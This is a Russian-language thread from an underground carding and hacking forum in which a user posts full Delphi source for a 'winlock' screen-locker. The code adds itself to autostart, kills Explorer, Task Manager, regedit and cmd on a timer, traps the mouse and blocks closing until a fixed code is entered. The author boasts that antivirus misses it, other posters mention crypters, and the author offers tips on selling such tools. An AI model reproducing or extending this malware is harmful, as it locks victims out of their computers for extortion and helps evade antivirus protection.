1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Винлог

Тема в разделе "Наши статьи", создана пользователем SAIND, 22 янв 2013.

  1. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Здорова............
    Программа чисто в образовательных целях (хочу чтобы учились программированию Т.К атомную бомбу создали ,а потом атомную станцию).:rolleyes: Хочу и от вас этого....
    Теперь к теме ......Посмотрел видео .......
    Ну это надо типо покупать у него ,а сейчас научу как это самому сделать ,,,,,,специально для нашего форума написал т.к уважаю некоторых и гостей.
    Что нам надо :
    1.Делфи
    2.Фотошоп
    3.Компьютер и немного мозгов если их нет то гогле в помощь))))))))
    Так у нас все есть "НАДЕЮСЬ" Качаем с нэта что будем писать как я это делаю на видео :
    Исходный код я выложу половину т.к он не палится даже 2012 капер пропустил
    Попожа научу как что замутить мне просто некогда ,просто подпишись и следи я её обновлю просто спать хоу))))))))))))))))
    Вот код винлока:​

    **Скрытый текст: Для просмотра скрытого текста Вы должны авторизоваться.**

    Пожалуйста Зарегистрируйтесь или Войдите для того чтоб увидеть текст сообщения!

    Вот палевность (ДАЖЕ КАПЕР НЕ СПАЛИЛ И ДОКТОР ВЕБ:p)Проверял на живых програмах и качал доктор вед и капера :


    Please login or register to view links



    **Скрытый текст: Для просмотра скрытого текста Вы должны авторизоваться.**

    Пожалуйста Зарегистрируйтесь или Войдите для того чтоб увидеть текст сообщения!

    P.Sвсе можно удалить в безопаснои режиме я этого не прописывал ,сами пропишите .На всякий случай команда "Windows+R">msconfig>удалить из авто заггрузки " program".​
     
    • Like Like x 6
    Метки:
  2. ImDeniil

    ImDeniil Гость

    ТЫ конечно молодец и я уважаю хорошие исходники хорошей малвари 5+.Но на форуме сидят люди совершенно без знаний дельфина (я токо bat знаю :D) и как мне дописывать код не представляю.По палевности смысл да пусть он всеми 35 палиться крипторы же есть :D
     
  3. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Не говорите тестируйте ,я просто спать хочу а так завтра весь код расскожу что каждая функция делает мне не в падлу
     
    • Like Like x 1
  4. bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    539
    Симпатии:
    622
    Почему сканы до конца не открываются? Или это только у меня?
     
  5. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Кому надо вот________________ это просто качайте и на виртуалке код под видео 987654321 тестируйте :)
    --- добавлено: 22 янв 2013 в 22:23 ---
    чего
    --- добавлено: 22 янв 2013 в 22:26 ---
    вирусов туда я не пихал это пруга мной написана ,но от неё ком может затупить :Dубивает все потомучто и если ты посмотриш код выше который поёммёш ,он для этого и создан.
     
  6. }{OTT@BY4

    }{OTT@BY4 Гость

    САИДУШКА Красавчик:))) РЕСПЕКТ
     
    • Like Like x 1
  7. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    чего какие сканы , я программу написал (и чесно не ток для тебя а для форума такого в паблике нет я её создал ток вчера)
    --- добавлено: 22 янв 2013 в 22:47 ---
    Ну РУсику слей он же в деле К .А то не палится ещё !!!!!!!!!!
     
  8. bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    539
    Симпатии:
    622
    Saind, ты не так понял я имел ввиду сканы chk.bz :D. Похоже только у меня так показывает :( Почему?[​IMG]
     
  9. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Я тебя учу? Вопросы задавай по сушеству пруга платная (я сам её написал),а я бобла не прошу а чтобы понять её это моё личное время чтобы тебе обьяснить .Пруга работает качай и все ,если нужна консультация пищи.Пруга не для гостей.
     
  10. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Завта опишу код ,чтобы понятно было ......
     
    • Like Like x 2
  11. Prince

    Prince

    Регистрация:
    14 май 2012
    Сообщения:
    448
    Симпатии:
    231
    Ну давай, ждемс!
     
  12. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Испытал у себя на другом компе работает как надо код поже опищу когда програмированием займусь
     
    • Like Like x 1
  13. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Учимся делфи :
    unit Unit1;

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, jpeg, ExtCtrls, StdCtrls, ShellAPI, RegisTry, XpMan;

    type
    TForm1 = class(TForm)
    Image1: TImage;
    Button1: TButton;
    Edit1: TEdit;
    Timer1: TTimer;

    procedure Button1Click(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure Edit1Change(Sender: TObject);
    procedure FormShow(Sender: TObject);

    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure FormMouseMove(Sender: TObject; Shift: TShiftState; X,
    Y: Integer);







    private
    { Private declarations }
    public
    { Public declarations }
    end;

    var
    Form1: TForm1;
    rec:TRect;-объявляем переменную

    implementation

    {$R *.dfm}
    procedure TForm1.Edit1Change(Sender: TObject);
    begin
    if Edit1.Text='987654321'then
    begin
    Button1.Enabled:=true;
    end;
    end;

    ///этот код дает тоесть если код верен тогда он врубает кнобку чтобы видемая была



    procedure TForm1.FormShow(Sender: TObject);
    var
    i:integer;
    var reg: tregistry;
    begin
    ///опять переменная

    {$I-}
    reg := tregistry.create;
    reg.rootkey := hkey_local_machine;
    reg.lazywrite := false;
    reg.openkey('software\microsoft\windows\currentversion\run', false);
    reg.writestring('progrmma', application.exename); {вместо programma можно вставить что нибудь своё}
    reg.closekey;
    reg.free;
    {$I+}
    {$I-}
    //код прописывет в авто загрузку в реестр
    showwindow(Application.handle, SW_HIDE);-удаляем иконку из панели задач
    WinExec('taskkill /f /im explorer.exe',SW_HIDE);-убиваем процес
    CopyFile(Pchar('serial.exe'), Pchar('C:\Windows\serial.exe'), true)-но это копия файла типо если его так назовете он его скапирует .



    end;


    procedure TForm1.Button1Click(Sender: TObject);
    begin
    application.Terminate;
    Timer1.Enabled:=false;
    ShellExecute(Handle,'open', 'C:\Windows\explorer.exe', nil, nil, SW_SHOWNORMAL);

    WinExec('REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v progrmma /f',SW_HIDE);
    close;

    end;
    ///если пороль веден верно он откючает таймер врубает процес экспортер и удаляет из авто загрузки


    procedure TForm1.Timer1Timer(Sender: TObject);
    begin
    Form1.FormStyle:=fsStayOnTop;
    WinExec('taskkill /f /im taskmgr.exe',SW_HIDE);
    WinExec('taskkill /f /im regedit.exe',SW_HIDE);
    WinExec('taskkill /f /im Taskmgr.exe',SW_HIDE);
    WinExec('taskkill /f /im cmd.exe',SW_HIDE);
    WinExec('taskkill /f /im explorer.exe',SW_HIDE);

    rec.Left:=form1.Left;
    Rec.Right:=form1.Left+Form1.Width;
    Rec.Top:=Form1.Top;
    Rec.Bottom:=Form1.Height+Form1.Top;
    ClipCursor(@rec);
    end;

    так таймер убивает процесы ,и делает мышку в форме.
    procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
    begin
    Form1.FormStyle:=fsStayOnTop;
    Action := caNone;
    end;
    ///функция не даёт воспользоватся кнобками альт+ф4 не закрыть не как
    procedure TForm1.FormMouseMove(Sender: TObject; Shift: TShiftState; X,
    Y: Integer);
    begin
    Form1.FormStyle:=fsStayOnTop; - поверх всех окон :D
    end;

    end.

    Дальше сами пропищете не ста писать ,его можно удолить ведя код либо перезагрузить в безапасном режиме ведя на исполение msconfig иудолить из вто загрузки program
     
    • Like Like x 1
  14. @nger

    @nger Гость

    и как это не из под админа будет работать?
    без эскалации привилегий даже хп-ишка нафиг пошлет такой код
     
  15. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    СЛУШАЙ ТЫ ИДИ НА*********Й СО СВОИМИ 6 -ШЕСТЬЮ ,,,,,,,СООБЩЕНИЯМИ У МЕНЯ ВСЕ РАБОТАЕТ И ПРОТЕСТИЛ У ДРУЗЕЙ НА 10 КОПАХ ВСЕ ПАШЕТ ,Я НЕ ВЫКЛАДЫВАЮ НЕ РАБОЧЕЕ НЕ КОГДА .......;)
     
  16. @nger

    @nger Гость

    значит вы все сидите на хпишке под учетками админа.
    советую попробывать на 7-ке х64 с включеным UAC и правами ограниченного пользователя
     
  17. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    А ТЫ ПОБЫВАЛ ЗАПУСКАТЬ ТЫ ВОБЩЕ КОД ЧИТАЛ ,ПРОГРАМА ЗАПУСКАЕТСЯ И КАЖДЫЕ 1,5 СЕКУНДЫ ВЫРУБАЕТ У ТЕБЯ ПРОЦЕСЫ :
    procedure TForm1.Timer1Timer(Sender: TObject);
    begin
    Form1.FormStyle:=fsStayOnTop;
    WinExec('taskkill /f /im taskmgr.exe',SW_HIDE);
    WinExec('taskkill /f /im regedit.exe',SW_HIDE);
    WinExec('taskkill /f /im Taskmgr.exe',SW_HIDE);
    WinExec('taskkill /f /im cmd.exe',SW_HIDE);
    WinExec('taskkill /f /im explorer.exe',SW_HIDE);

    rec.Left:=form1.Left;
    Rec.Right:=form1.Left+Form1.Width;
    Rec.Top:=Form1.Top;
    Rec.Bottom:=Form1.Height+Form1.Top;
    ClipCursor(@rec);
    end;

    НАДЕЮСЬ ТЫ ПОНЯЛ,,,:!!! и ЧТО ТАМ У ТЕБЯ СТОИТ 64 ИЛИ 32. НА 10 КОМПАХ ПРОВЕРИЛ .....АДМИН ИЗВЕНИ НО ПРОСТО НЕТ БОЛЬШЕ СЛОВ....
    --- добавлено: 23 янв 2013 в 20:22 ---
    НЕ СТЕСНЯЙТЕСЬ ПИШИТЕ МОЖЕТ ЧТО-ТО ДОПИСАТЬ КАКУЮ ФУНКЦИЮ :rolleyes:
     
    • Like Like x 1
  18. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    если вы как пишете больше вам не напишу не одной программы,такие штуки продают ,я для этого сайта бесплатно мне не в падлу ,ша пишу уневирсальный бруд на все сайты......и тоже выложу бесплатно ,другие казлы продают.
     
  19. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Чет не одного вопроса ,такие штуки продают ,можете делать и продавать скажу как....:D
     
  20. TopicStarter Overlay
    SAIND

    SAIND

    Регистрация:
    27 сен 2012
    Сообщения:
    743
    Симпатии:
    606
    Код читай ShellExecute дает исполнение файлов припаял свой батник к исходнику и всё библеотеку не забуть добавить ShellAPI
     

Поделиться этой страницей

Загрузка...